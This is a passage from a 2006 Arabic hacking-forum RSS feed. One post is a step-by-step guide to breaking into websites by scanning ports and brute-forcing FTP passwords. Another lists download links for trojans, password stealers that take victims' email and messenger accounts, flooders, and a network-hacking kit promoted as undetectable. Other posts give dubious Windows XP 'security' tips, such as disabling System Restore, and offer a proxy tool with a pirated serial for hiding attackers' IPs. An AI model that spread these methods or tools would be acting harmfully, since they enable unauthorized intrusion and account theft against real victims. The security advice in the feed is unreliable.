البرنامــــــــــــــج فـــــــى المرفقــــــــات</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25306</guid>
		</item>
		<item>
			<title>أسهل وافضل طريقة اختراق للمواقع عن طريق الاف تي بي</title>
			<link>https://kwety.net/vb/showthread.php?t=25139&amp;goto=newpost</link>
			<pubDate>Wed, 12 Jul 2006 09:07:22 GMT</pubDate>
			<description>السلام عليكـــــــــم


اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى
 
www.victime.com (http://www.victime.com/)

يكون من الصعب اختراقه بالنسبة لاى هكر لانه غالبا ما يستخدم DNS 

Server 

ونظم حماية كثيرة قد تصعب نسبة اختراقة 99% 

لكن كن معى فى هذا الموضوع وسيكون كل شىء سهل بذن الله 

يجب عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه

 الخطوة 

يجب ان نعرف نظم الحماية التى يستخدمها الموقع 

ومن صاحب الموقع 

وكل شىء اولا كى نستطيع دخول ساحة المناورة 

لتقوم بذلك قم بالدخول الى هذا الموقع 

http://www.whois.net (http://www.whois.net/) 

فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر 

WHOIS Lookup 

قم بكتابة اسم الموقع بجوارها على سبيل المثال 

Victim.com 

victim = الموقع الذى تريد احضار المعلومات عنه 

ثم اضغط go 

سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن 

الحماية التى يستخدموها والشركة المستضيفة للموقع 

قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت 

من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى

 سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس 

الموقع لتحضر معلومات اكثر 

ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها 

واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع 

التى تعطيك معلومات عن نظم الحماية 

http://www.netcraft.com (http://www.netcraft.com/) 

وهكذا نكون قد انتهينا من اول خطوة 
 
قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل 

برنامج 

site port scan , Gfi lan giard network securty scanner 

او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة 

وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى 

السيرفر 

غالبا ما ستجد البورت 80 و 21 و 808 

لا يمكننا الهجوم من خلال البورت رقم 21 حيث انه سيكون مشفر بكلمة سر 

لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من 

خلاله 

لدينا فى اكثر الحالات منفذان البورت 80 و 808 

او 80 فقط اذا كان 

اذا ظهر لك 80 فقط فما فى شىء بيتغير وتكون الخطوات تمام 

قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال 

برنامج 

ws-ftp 

او 

cute 

مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات 

الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج 

قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن 

طريق الاف تى بى وغالبا ما يكون ftp.sitename.address 

sitename = اسم الموقع 

address = الامتداد .com او .net او غير ذلك 

فى المرة هذه الخطوة قم بالدخول بصفة زائر 

وذلك عن طريق وضع علامة صح امام كلمة anonymous 

وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك 

اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة 

فان قسم الزوار يكون فارغ 

اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع 

واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار 

قم بتحميل برنامج unsecure وهو افضل برامج اختراق المواقع 

لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق 

وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل 

عن هذا الاسم 

unsecure 1.2 

وستجد مئات المواقع باذن الله 

بعد ان تقوم بتحميل البرنامج 

قم بكتابة عنوان الاف تى بى الخاص بالموقع 

او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها 

قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس 

لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت 

وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم 

بتخمين كلى للباس وردات 

بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى 

من البورت 21 وليس 80 

واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت 

مثال اذا كان الموقع usa.com 

يكون اسم الدخول usa 

ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك 

وهكذا تكون قد اخترقت الموقع ....
</description>
			<content:encoded><![CDATA[<div><div align="center">السلام عليكـــــــــم<br />
<br />
<br />
اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى<br />
 <br />
<font color="red"><a href="http://www.victime.com/" target="_blank">www.victime.com</a></font><br />
<br />
يكون من الصعب اختراقه بالنسبة لاى هكر لانه غالبا ما يستخدم <font color="DarkGreen">DNS <br />
<br />
Server </font><br />
<br />
ونظم حماية كثيرة قد تصعب نسبة اختراقة 99% <br />
<br />
لكن كن معى فى هذا الموضوع وسيكون كل شىء سهل بذن الله <br />
<br />
يجب عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه<br />
<br />
 الخطوة <br />
<br />
يجب ان نعرف نظم الحماية التى يستخدمها الموقع <br />
<br />
ومن صاحب الموقع <br />
<br />
وكل شىء اولا كى نستطيع دخول ساحة المناورة <br />
<br />
لتقوم بذلك قم بالدخول الى هذا الموقع <br />
<br />
<font color="red"><a href="http://www.whois.net/" target="_blank">http://www.whois.net</a></font> <br />
<br />
فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر <br />
<br />
<font color="darkgreen">WHOIS Lookup </font><br />
<br />
قم بكتابة اسم الموقع بجوارها على سبيل المثال <br />
<br />
<font color="darkgreen">Victim.com</font> <br />
<br />
<font color="darkgreen">victim</font> = الموقع الذى تريد احضار المعلومات عنه <br />
<br />
ثم اضغط <font color="darkgreen">go</font> <br />
<br />
سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن <br />
<br />
الحماية التى يستخدموها والشركة المستضيفة للموقع <br />
<br />
قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت <br />
<br />
من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى<br />
<br />
 سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس <br />
<br />
الموقع لتحضر معلومات اكثر <br />
<br />
ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها <br />
<br />
واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع <br />
<br />
التى تعطيك معلومات عن نظم الحماية <br />
<br />
<font color="red"><a href="http://www.netcraft.com/" target="_blank">http://www.netcraft.com</a></font> <br />
<br />
وهكذا نكون قد انتهينا من اول خطوة <br />
 <br />
قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل <br />
<br />
برنامج <br />
<br />
<font color="darkgreen">site port scan , Gfi lan giard network securty scanner</font> <br />
<br />
او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة <br />
<br />
وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى <br />
<br />
السيرفر <br />
<br />
غالبا ما ستجد البورت <font color="darkgreen">80</font> و <font color="darkgreen">21</font> و <font color="darkgreen">808</font> <br />
<br />
لا يمكننا الهجوم من خلال البورت رقم <font color="darkgreen">21 </font>حيث انه سيكون مشفر بكلمة سر <br />
<br />
لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من <br />
<br />
خلاله <br />
<br />
لدينا فى اكثر الحالات منفذان البورت <font color="darkgreen">80 و 808</font> <br />
<br />
او <font color="darkgreen">80</font> فقط اذا كان <br />
<br />
اذا ظهر لك <font color="darkgreen">80</font> فقط فما فى شىء بيتغير وتكون الخطوات تمام <br />
<br />
قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال <br />
<br />
برنامج <br />
<br />
<font color="darkgreen">ws-ftp</font> <br />
<br />
او <br />
<br />
<font color="darkgreen">cute</font> <br />
<br />
مع تغيير البورت من <font color="darkgreen">21</font> الى <font color="darkgreen">80</font> او المنفذ الذى ظهر اليك مفتوح فى خيارات <br />
<br />
الادفاسيد <font color="darkgreen">advanced</font> الموجودة فى الشاشة الابتدائية للبرنامج <br />
<br />
قم بكتابة مكان <font color="darkgreen">host</font> رقم الاى بى الخاص بالموقع او عنوان الموقع عن <br />
<br />
طريق الاف تى بى وغالبا ما يكون <font color="darkgreen">ftp.sitename.address</font> <br />
<br />
<font color="darkgreen">sitename</font> = اسم الموقع <br />
<br />
<font color="darkgreen">address</font> = الامتداد .<font color="darkgreen">com</font> او .<font color="darkgreen">net</font> او غير ذلك <br />
<br />
فى المرة هذه الخطوة قم بالدخول بصفة زائر <br />
<br />
وذلك عن طريق وضع علامة صح امام كلمة <font color="darkgreen">anonymous</font> <br />
<br />
وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك <br />
<br />
اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة <br />
<br />
فان قسم الزوار يكون فارغ <br />
<br />
اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع <br />
<br />
واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار <br />
<br />
قم بتحميل برنامج <font color="darkgreen">unsecure</font> وهو افضل برامج اختراق المواقع <br />
<br />
لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق <br />
<br />
وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل <br />
<br />
عن هذا الاسم <br />
<br />
<font color="darkgreen">unsecure 1.2</font> <br />
<br />
وستجد مئات المواقع باذن الله <br />
<br />
بعد ان تقوم بتحميل البرنامج <br />
<br />
قم بكتابة عنوان الاف تى بى الخاص بالموقع <br />
<br />
او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها <br />
<br />
قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس <br />
<br />
لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت <br />
<br />
وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم <br />
<br />
بتخمين كلى للباس وردات <br />
<br />
بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى <br />
<br />
من البورت <font color="darkgreen">21</font> وليس <font color="darkgreen">80</font> <br />
<br />
واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت <br />
<br />
مثال اذا كان الموقع <font color="darkgreen">usa.com</font> <br />
<br />
يكون اسم الدخول <font color="darkgreen">usa</font> <br />
<br />
ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك <br />
<br />
وهكذا تكون قد اخترقت الموقع ....</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25139</guid>
		</item>
		<item>
			<title>برامج هاكر عربيه 100%</title>
			<link>https://kwety.net/vb/showthread.php?t=25050&amp;goto=newpost</link>
			<pubDate>Tue, 11 Jul 2006 11:52:38 GMT</pubDate>
			<description><![CDATA[اسم البرنامج : الهكر الأسطوري الإصدار الثاني
معلومات عن البرنامج:
البرنامج الذي بدء به الوحش المدمر ولوفر ستودنت الطريق في برمجة أفضل برنامج اختراق عربي , وفعلاً حصل هذا البرنامج على رضاء كثير من الناس حول العالم العربي حيث يتميز عن سائر البرامج المبرمجة في الفيجول بيسك عدم حاجة الخادم إلى أية ملفات تشغيلية 

لتحميل البرنامج : http://www.evil-code.com/zips/LHv2.0.zip

------------

اسم البرنامج : الهكر الأسطوري الإصدار الثالث

معلومات عن البرنامج : 
الإصدار الجديد من البرنامج حيث يتمتع بمميزات رائعة وجديدة وتميزه عن سائر البرامج حيث أصبح أسرع من ذي قبل وبخيارات متوسعة جداً ومتطورة تغنيك عن استخدام برامج الغرب 

لتحميل البرنامج : http://www.evil-code.com/zips/lhv3.zip

---------------

اسم البرنامج : باسورد ديفل الإصدار الأول
معلومات عن البرنامج :
سارق باسورد رائع حيث يمكنك من سرقة الإيميل والاشتراكات لدى الضحية والتلاعب بماسينجر الضحية بالإضافة إلى الماتريكس الجديد والقوي وإمكانية إحضار جميع الإيميلات المضافة لدى الضحية والاسم الخاص بهم لديه في الماسينجر وبالإضافة بأن سيرفر البرنامج حجمه 165 ك.ب ويعمل على جميع إصدارات الوندوز بدون ملفات مساعدة !!

لتحميل البرنامج : http://www.evil-code.com/zips/Ps%20Devil.zip

-------------

اسم البرنامج : باسورد ديفل الإصدار الثاني المطور
معلومات عن البرنامج :
قوة إحضار الباسوردات اللا معقولة في هذا البرنامج العربي الرهيب ,, فيحضر الباسوردات المخزنة في الوندوز والمخزنة في جهاز الضحية والإشتراك والماسينجر ,, والقدرة القوية على التحكم بماسينجر الضحية حيث يمكنك من إرسال رسالة إلى من يحادثه الضحية سواء بطريقة الفلود أو بطريقة الكتابة مره واحدة وأهم ما يتميز به البرنامج سرعة الإتصال العجيبة حيث تمت تجربة البرنامج على الشبكة السورية [ الشبكة السورية مشهورة بضعفها للأسف الشديد ] وكانت نتائج التجربة رائعة جداً جداً !! ,, فعلاً البرنامج قوي بمعنى الكلمة ,, استخدمه مع الهكر الأسطوري لكي تكون المسيطر على جهاز الضحية تمامــــاً !!

لتحميل البرنامج : http://www.evil-code.com/zips/PsDevil2.zip

-----------------

اسم البرنامج : Super XXX Floder
معلومات البرنامج :
أول برنامج عربي للإزعاج وأقوى فلود عربي عرف يتميز بأنه يمكنك تحديد سرعة الفلود بنفسك من أسرع إلى أبطئ بحسب ما يناسبك وأهم ميزة أنه فلود لجميع البرامج والماسنجرات والشاتات !! .. حمل البرنامج وأقرأ الشرح المرفق للمزيد ...

لتحميل البرنامج : http://www.evil-code.com/zips/Super%20XX%20FloodEr.zip

---------------

اسم البرنامج : أدوات حمادة هكرز لاختراق الشبكات 
معلومات عن البرنامج : 
برنامج رائع لاختراق شبكة كاملة مثل المقاهي والسيرفر الذي لا يكتشفه أي أنتي فايرس برنامج رائع ,, لماذا لا تجربه ؟؟

لتحميل البرنامج :http://www.evil-code.com/zips/servers-hack.zip

-------------------

اسم البرنامج : ARAB HACKERZ
معلومات عن البرنامج : برنامج رائع جداً جداً من الأخ فراس واجهة رائعة وأوامر رهيبه يكفي تسميته بالهكر العربي !

لتحميل البرنامج : http://www.evil-code.com/zips/arab%20hackerz.zip

--------------
اسم البرنامج : سراب فير Sarab Fear
معلومات عن البرنامج :برنامج جيد لإرسال الباتشات عبر الماسينجر دون علم الضحية !!
لتحميل البرنامج : http://www.evil-code.com/zips/SF.zip
------------

اسم البرنامج : XxXFlooDXxX
معلومات البرنامج :برنامج فلود قوي مقتبسه فكرته من برنامج سوبر اكس فلودر P: ..

لتحميل البرنامج : http://www.evil-code.com/zips/XxXFlooDXxX.zip
__________________]]></description>
			<content:encoded><![CDATA[<div><font color="DarkOrange">اسم البرنامج : الهكر الأسطوري الإصدار الثاني<br />
معلومات عن البرنامج:<br />
البرنامج الذي بدء به الوحش المدمر ولوفر ستودنت الطريق في برمجة أفضل برنامج اختراق عربي , وفعلاً حصل هذا البرنامج على رضاء كثير من الناس حول العالم العربي حيث يتميز عن سائر البرامج المبرمجة في الفيجول بيسك عدم حاجة الخادم إلى أية ملفات تشغيلية <br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/LHv2.0.zip" target="_blank">http://www.evil-code.com/zips/LHv2.0.zip</a><br />
<br />
------------<br />
<br />
اسم البرنامج : الهكر الأسطوري الإصدار الثالث<br />
<br />
معلومات عن البرنامج : <br />
الإصدار الجديد من البرنامج حيث يتمتع بمميزات رائعة وجديدة وتميزه عن سائر البرامج حيث أصبح أسرع من ذي قبل وبخيارات متوسعة جداً ومتطورة تغنيك عن استخدام برامج الغرب <br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/lhv3.zip" target="_blank">http://www.evil-code.com/zips/lhv3.zip</a><br />
<br />
---------------<br />
<br />
اسم البرنامج : باسورد ديفل الإصدار الأول<br />
معلومات عن البرنامج :<br />
سارق باسورد رائع حيث يمكنك من سرقة الإيميل والاشتراكات لدى الضحية والتلاعب بماسينجر الضحية بالإضافة إلى الماتريكس الجديد والقوي وإمكانية إحضار جميع الإيميلات المضافة لدى الضحية والاسم الخاص بهم لديه في الماسينجر وبالإضافة بأن سيرفر البرنامج حجمه 165 ك.ب ويعمل على جميع إصدارات الوندوز بدون ملفات مساعدة !!<br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/Ps%20Devil.zip" target="_blank">http://www.evil-code.com/zips/Ps%20Devil.zip</a><br />
<br />
-------------<br />
<br />
اسم البرنامج : باسورد ديفل الإصدار الثاني المطور<br />
معلومات عن البرنامج :<br />
قوة إحضار الباسوردات اللا معقولة في هذا البرنامج العربي الرهيب ,, فيحضر الباسوردات المخزنة في الوندوز والمخزنة في جهاز الضحية والإشتراك والماسينجر ,, والقدرة القوية على التحكم بماسينجر الضحية حيث يمكنك من إرسال رسالة إلى من يحادثه الضحية سواء بطريقة الفلود أو بطريقة الكتابة مره واحدة وأهم ما يتميز به البرنامج سرعة الإتصال العجيبة حيث تمت تجربة البرنامج على الشبكة السورية [ الشبكة السورية مشهورة بضعفها للأسف الشديد ] وكانت نتائج التجربة رائعة جداً جداً !! ,, فعلاً البرنامج قوي بمعنى الكلمة ,, استخدمه مع الهكر الأسطوري لكي تكون المسيطر على جهاز الضحية تمامــــاً !!<br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/PsDevil2.zip" target="_blank">http://www.evil-code.com/zips/PsDevil2.zip</a><br />
<br />
-----------------<br />
<br />
اسم البرنامج : Super XXX Floder<br />
معلومات البرنامج :<br />
أول برنامج عربي للإزعاج وأقوى فلود عربي عرف يتميز بأنه يمكنك تحديد سرعة الفلود بنفسك من أسرع إلى أبطئ بحسب ما يناسبك وأهم ميزة أنه فلود لجميع البرامج والماسنجرات والشاتات !! .. حمل البرنامج وأقرأ الشرح المرفق للمزيد ...<br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/Super%20XX%20FloodEr.zip" target="_blank">http://www.evil-code.com/zips/Super%20XX%20FloodEr.zip</a><br />
<br />
---------------<br />
<br />
اسم البرنامج : أدوات حمادة هكرز لاختراق الشبكات <br />
معلومات عن البرنامج : <br />
برنامج رائع لاختراق شبكة كاملة مثل المقاهي والسيرفر الذي لا يكتشفه أي أنتي فايرس برنامج رائع ,, لماذا لا تجربه ؟؟<br />
<br />
لتحميل البرنامج :<a href="http://www.evil-code.com/zips/servers-hack.zip" target="_blank">http://www.evil-code.com/zips/servers-hack.zip</a><br />
<br />
-------------------<br />
<br />
اسم البرنامج : ARAB HACKERZ<br />
معلومات عن البرنامج : برنامج رائع جداً جداً من الأخ فراس واجهة رائعة وأوامر رهيبه يكفي تسميته بالهكر العربي !<br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/arab%20hackerz.zip" target="_blank">http://www.evil-code.com/zips/arab%20hackerz.zip</a><br />
<br />
--------------<br />
اسم البرنامج : سراب فير Sarab Fear<br />
معلومات عن البرنامج :برنامج جيد لإرسال الباتشات عبر الماسينجر دون علم الضحية !!<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/SF.zip" target="_blank">http://www.evil-code.com/zips/SF.zip</a><br />
------------<br />
<br />
اسم البرنامج : XxXFlooDXxX<br />
معلومات البرنامج :برنامج فلود قوي مقتبسه فكرته من برنامج سوبر اكس فلودر P: ..<br />
<br />
لتحميل البرنامج : <a href="http://www.evil-code.com/zips/XxXFlooDXxX.zip" target="_blank">http://www.evil-code.com/zips/XxXFlooDXxX.zip</a><br />
__________________</font></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>أنـــــوسـه ^_^</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25050</guid>
		</item>
		<item>
			<title>اخطر الثغرات فى ويندوز اكس بى وكيفية علاجها</title>
			<link>https://kwety.net/vb/showthread.php?t=24965&amp;goto=newpost</link>
			<pubDate>Mon, 10 Jul 2006 12:56:07 GMT</pubDate>
			<description><![CDATA[السلام عليكـــــــــــم



اخطر  4 ثغرات بويندوز اكس بى 
 
 
الكثير منا تورقة مشكلة مايسمى بالهكر 
 
ويعتمد الهكر على الثغرات الموجودة بجهازك بشكل رئيسى 
 
لذا فعليك ان تتعرف على هذة الثغرات لكى تقوم  بحماية جهازك ضد اى
 
متطفل او مخرب 
 
ومن اخطر هذة الثغرات كما يلى :
 
 

الثغرة الأولى :
 
تعتبر إحدى البوابات الخطرة للفايروسات و ملفات التجسس 
 
لوحة التحكم control panel

خيارات المجلد folder options

أنواع الملفات file types

وهناك ابحثو عن
 
ًWindows script host setting file

و احذفوه على الفور
 

الثغرة الثانية :

اسمها مشاركة ملفات بسيطة simple file sharing

لكن تفعيلها مش بسيط بل هو خطير جدا 

خيارات المجلد folder options

عرض view

يجب إزالة علامة الصح من داخل المربع أمام 

مشاركة ملفات بسيطة مستحسن

use simple file sharing

recommended
 
 
 
الثغرة الثالثة :

اسمها عدم حفظ الصفحات المشفرة إلى القرص 

save encrypted page to disk
 
و الطريقة كالتالي 
 
لوحة التحكم control panel

خيارات انترنت ineternet options

خيارات متقدمة advanced

وضع علامة صح داخل المربع 

عدم حفظ الصفحات المشفرة إلى القرص 

don't save encrypted page to disk

ثم موافق
 
و أحب أنوه إلى شي مهم و هو 

عند الضغط على 

إستعادة الإفتراضيات

restore default

بترجع علامات الصح مرة ثانية 

وكذلك الحال مع ثغرة 

مشاركة ملفات بسيطة 

simple file sharing
 
 
 
الثغرة الرابعة :
 
اذهب الى  my computer
 
ثم قف فى اى مكان فارغ بالماوس  ثم اضغط بمؤشر الماوس الايمن   واختر
 
properties
 
ثم 

system restore
 
وضع علامة صح بالمربع 
 
turn of  system restore 
 
 
 
هذة اخطر اربعة ثغرات بويندوز اكس بى  وعلاجها امر هام جدا لحماية جهازك 


تحيــــــــــــــــــــاتـــــــــــــــــــــــى
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font color="darkgreen">السلام عليكـــــــــــم</font><br />
<br />
<br />
<br />
<font color="Red">اخطر  4 ثغرات بويندوز اكس بى </font><br />
 <br />
 <br />
الكثير منا تورقة مشكلة مايسمى بالهكر <br />
 <br />
ويعتمد الهكر على الثغرات الموجودة بجهازك بشكل رئيسى <br />
 <br />
لذا فعليك ان تتعرف على هذة الثغرات لكى تقوم  بحماية جهازك ضد اى<br />
 <br />
متطفل او مخرب <br />
 <br />
ومن اخطر هذة الثغرات كما يلى :<br />
 <br />
 <br />
<br />
<font color="red">الثغرة الأولى :</font><br />
 <br />
تعتبر إحدى البوابات الخطرة للفايروسات و ملفات التجسس <br />
 <br />
لوحة التحكم <font color="darkgreen">control panel</font><br />
<br />
خيارات المجلد <font color="darkgreen">folder options</font><br />
<br />
أنواع الملفات <font color="darkgreen">file types</font><br />
<br />
وهناك ابحثو عن<br />
 <br />
<font color="darkgreen">ًWindows script host setting file</font><br />
<br />
و احذفوه على الفور<br />
 <br />
<br />
<font color="red">الثغرة الثانية :</font><br />
<br />
اسمها مشاركة ملفات بسيطة <font color="darkgreen">simple file sharing</font><br />
<br />
لكن تفعيلها مش بسيط بل هو خطير جدا <br />
<br />
خيارات المجلد <font color="darkgreen">folder options</font><br />
<br />
عرض <font color="darkgreen">view</font><br />
<br />
يجب إزالة علامة الصح من داخل المربع أمام <br />
<br />
مشاركة ملفات بسيطة مستحسن<br />
<br />
<font color="darkgreen">use simple file sharing</font><br />
<br />
<font color="darkgreen">recommended</font><br />
 <br />
 <br />
 <br />
<font color="red">الثغرة الثالثة :</font><br />
<br />
اسمها عدم حفظ الصفحات المشفرة إلى القرص <br />
<br />
<font color="darkgreen">save encrypted page to disk</font><br />
 <br />
و الطريقة كالتالي <br />
 <br />
لوحة التحكم <font color="darkgreen">control panel</font><br />
<br />
خيارات انترنت <font color="darkgreen">ineternet options</font><br />
<br />
خيارات متقدمة <font color="darkgreen">advanced</font><br />
<br />
وضع علامة صح داخل المربع <br />
<br />
عدم حفظ الصفحات المشفرة إلى القرص <br />
<br />
<font color="darkgreen">don't save encrypted page to disk</font><br />
<br />
ثم موافق<br />
 <br />
و أحب أنوه إلى شي مهم و هو <br />
<br />
عند الضغط على <br />
<br />
إستعادة الإفتراضيات<br />
<br />
<font color="darkgreen">restore default</font><br />
<br />
بترجع علامات الصح مرة ثانية <br />
<br />
وكذلك الحال مع ثغرة <br />
<br />
مشاركة ملفات بسيطة <br />
<br />
<font color="darkgreen">simple file sharing</font><br />
 <br />
 <br />
 <br />
<font color="red">الثغرة الرابعة :</font><br />
 <br />
اذهب الى  <font color="darkgreen">my computer</font><br />
 <br />
ثم قف فى اى مكان فارغ بالماوس  ثم اضغط بمؤشر الماوس الايمن   واختر<br />
 <br />
<font color="darkgreen">properties</font><br />
 <br />
ثم <br />
<br />
<font color="darkgreen">system restore</font><br />
 <br />
وضع علامة صح بالمربع <br />
 <br />
<font color="DarkGreen">turn of  system restore</font> <br />
 <br />
 <br />
 <br />
هذة اخطر اربعة ثغرات بويندوز اكس بى  وعلاجها امر هام جدا لحماية جهازك <br />
<br />
<br />
<font color="red">تحيــــــــــــــــــــاتـــــــــــــــــــــــى</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=24965</guid>
		</item>
		<item>
			<title>لأخفاء الايبي واعطائك افضل انواع البروكسي على مدار الساعة</title>
			<link>https://kwety.net/vb/showthread.php?t=24381&amp;goto=newpost</link>
			<pubDate>Sat, 01 Jul 2006 01:04:17 GMT</pubDate>
			<description>السلام عليكــــم



طبعا كلنا يعرف اهمية البروكسي خاصة لمخترقي 

المواقع .

اليكم برنامج:

Gonsoft Proxy Manager 2.28

برنامج صغير ورائع لأعطائكم افضل انواع البروكسي 

على مدار الساعة 

وسحب البروكسيات بشكل ألي من المواقع وانزالها على اعدادات البروكسي

في اجهزتكم وايضا به خاصية الـتأكد من صحة البروكسي من ناحية ان كان

شغال او لا!


البرنامج والسيريال بالمرفقاااات
</description>
			<content:encoded><![CDATA[<div><div align="center"><font color="DarkGreen">السلام عليكــــم</font><br />
<br />
<br />
<br />
<font color="Navy">طبعا كلنا يعرف اهمية البروكسي خاصة لمخترقي <br />
<br />
المواقع .</font><br />
<br />
<font color="navy">اليكم برنامج:</font><br />
<br />
<font color="Red">Gonsoft Proxy Manager 2.28</font><br />
<br />
<font color="navy">برنامج صغير ورائع لأعطائكم افضل انواع البروكسي <br />
<br />
على مدار الساعة <br />
<br />
وسحب البروكسيات بشكل ألي من المواقع وانزالها على اعدادات البروكسي<br />
<br />
في اجهزتكم وايضا به خاصية الـتأكد من صحة البروكسي من ناحية ان كان<br />
<br />
شغال او لا!</font><br />
<br />
<br />
<font color="Red">البرنامج والسيريال بالمرفقاااات</font></div></div>


	<br />
	<div style="padding:6px">

	

	

	

	
		<fieldset class="fieldset">
			<legend>الملفات المرفقة</legend>
			<table cellpadding="0" cellspacing="3" border="0">
			<tr><td dir="rtl">
	<table border="0" cellpadding="0" width="100%" bordercolor="#444" id="table2" dir="rtl">
		<tr>
			<td><img border="0" class="inlineimg" src="https://kwety.net/vb/5star/attach/rar.gif" alt="&lt;phrase 1=&quot;rar&quot;&gt;نوع الملف: %1$s&lt;/phrase&gt;" width="16" height="16">
	<a href="https://kwety.net/vb/attachment.php?attachmentid=4757" target="_blank">
ProxyManager.rar&rlm;</a>&nbsp;&nbsp;
<input type="text" name="T2" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value=" حجم الملف :  660.4 كيلوبايت">
<input type="text" name="T1" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value="المشاهدات غير معروف">&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;</td>
		</tr>
	</table><tr><td dir="rtl">
	<table border="0" cellpadding="0" width="100%" bordercolor="#444" id="table2" dir="rtl">
		<tr>
			<td><img border="0" class="inlineimg" src="https://kwety.net/vb/5star/attach/txt.gif" alt="&lt;phrase 1=&quot;txt&quot;&gt;نوع الملف: %1$s&lt;/phrase&gt;" width="16" height="16">
	<a href="https://kwety.net/vb/attachment.php?attachmentid=4821" target="_blank">
seria.txt&rlm;</a>&nbsp;&nbsp;
<input type="text" name="T2" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value=" حجم الملف :  80 بايت">
